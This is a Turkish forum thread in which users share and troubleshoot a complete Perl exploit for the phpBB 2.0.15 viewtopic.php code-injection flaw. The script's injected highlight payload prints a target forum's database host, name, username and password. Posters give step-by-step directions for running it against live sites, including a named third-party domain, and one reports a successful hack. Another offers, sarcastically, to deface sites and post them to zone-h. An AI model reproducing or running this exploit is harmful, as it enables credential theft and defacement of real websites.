Bilişim Güvenliği
Phpbb 2.0.15 "Viewtopic.Php" Remote PHP Code Execution Exploit
Phpbb 2.0.15 "Viewtopic.Php" Remote PHP Code Execution Exploit
-
2PAC bunu yazdı:
bi b.k anlamadm walla.....
pro nerde neyi nerde ve nasıl kullanacağız? sanki bunları sadece bilenler kendi aralarında paylaşıyorlarmı ...yanii..ne bilim hocam öğretmenlik yapacak birileri.....
eğitim şart dimi ama
güzel kardeşim istersen sen hacklemek istediğin site adreslerini ver hatta verme biz google dan buluruz senin yerine index atalım hatta zone-h ye ekleyelim senin yerine?
arkadaş anlatmış dosyayı kaydet perl in bin dizininde şu şekilde çalıştır demiş hatta screenshot bile koymuş bunuda yapamıyosanız dediğim gibi sizin yerinize index atalım? -
FiSTaNDaNTiLuS bunu yazdı:
ben perl/bin dizinine exploiti "phpbbSecureD.pl" şeklinde kaydetim perli açıp alttaki kod satırını yazdım ama kabul etmedi. Site örnektir..
perl phpbbSecureD.pl www.akvadi.com /akvadi/ 80
Semicolon seems to be missing hatası veriyor neyi yanlış yapıyorum?
aynı hatayı bende de veriyor. -
Seer bunu yazdı:
DİKKAT:Az ewwel yazmıs oldugum cevapta yanlıslık var
80 yerine 20 veya 8 Gelicek!!!!!!
5-6Dk önceki hacked.cok güzel bi sekilde calısıyorbu arada yukarıdaki kod ile senin kodun aynı değilmiş galiba seer www.milw0rm.com dan sendeki kodu indirdim bu sefer de can't locate IO/socket.pm hatası aldım dosyayı google da aratıp kopyaladım ama ilk satırda hata buldu bu sefer.
herhalde yanlış dosya indirdim bana bu dosyayı verebilirmisiniz.
-
Kullanmıs oldugum ir2 nin vermiş oldugu Pl exploitidir!
Herhangi bir yerden bulmadım!
Tesekkurler ir2:)
Perl Exploiti nedir?nasıl kullanılır diyenler icin Dokuman
Buyrun takıldıgınız yerde foruma yazın veya mailden ulasın
Kolay gelsin -
-Klasor Secenekleri>Görünüm>Bilinen Dosya türleri icin uzantıları gizle
Secenegini kaldırın
Dosyalar artık uzantılarıyla görünücek örn:seer.txt-ir2 nin yayınlamıs oldugu kodları kopyalayın. yeni bir txt dosyası olusturun
dosyayı phpBBSecureD.pl seklinde kaydedin. txt uzantısı yerine pl gelicek-Kod hazır.Bunu kuracagımız Active Perl in "Bin" dizini altına atıyoruz
Active Perli www.activeperl.com den indiriyorsunuz:)-Perli kuruyorsunuz
-Komut sistemine gelip "cd.." yapıyoruz taki C:\ kök dizinine gelene kadar
-Sonra screnshoot ta göstermiş olduklarımı uygularsanız tamadır
/////NOTlar://///
-Domain degil ip adresi yazıyoruz
Akvadi.com degilde akvadinin ipsi
(ping akvadi.com :):):) )-explotin nasıl calıstıgını ögrenmek icin
"perl exploitadi.pl" veya "perl exploitadi.pl -h www.domainadi.com" seklinde uygulamıs oluyoruzSize Ex'in nasıl kullanılacagını Exploit anlatıyor
-Perl i kullanmak icin DOS komutlarını bilmekte fayda var
-FiSTaNDaNTiLuS adlı arkadasa msnde anlattım.Ona basvura bilirsiniz:)
Kolay gelsin bundan fazlasını birsey beklemeyin.
Seer...
-
phyt0n hatası verenler aşşağıdaki ex e aynı uygulamaları yapın bende vermiyor..
#!/usr/bin/perl
# **************************************************************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#** This exploit gives the user all the details about the database
#** connection such as database host, username, password and
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
#**
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# **************************************************************use IO::Socket;
print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\n\n";print "[+] Connecting OK\n";
sleep(1);print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";
$succes = 0;while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}close($sock);
if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
} -
hepinize teşekkür ediyorum benim hatam kullandığım perlden kaynaklanıyormuş arkadaşın verdiği linkten activeperl ü indirip kurunca olay çözüldü.
döküman için de ayrıca teşekkürler seer
-
Rica ederim.Gelirisi gelicek allahın izinyle
MCSE üzerinde yazmayı planlıyorum.bakalım artık -
yalnız benim bir sorum daha olacak forumun versiyonu phpBB 2.0.15 olduğu kesin olduğu halde connecting ok
sending exploit failed
demesinin ne gibi sebepleri olabilir. yani kullandığı server fln engellemiş olabilir mi yoksa hata kesinlikle bendemi yani kodun parametrelerini yanlış girmek fln gibi. bende hata yok gibi gözüküyor çünkü seerin screen shotındaki ip yi girdim ve aynı cevabı aldım. ama diğer site de failed yazdı.
-
2 Sebebi var
1.si O sitede exploitin mevcut olmaması
2.si Yanlıs deger girmen
(örn: /forumlarimiz/ seklinde bi forum yolu olsun bunu dikkatsizlik sonucu /forum/ seklinde calıstırman.veya vb seyler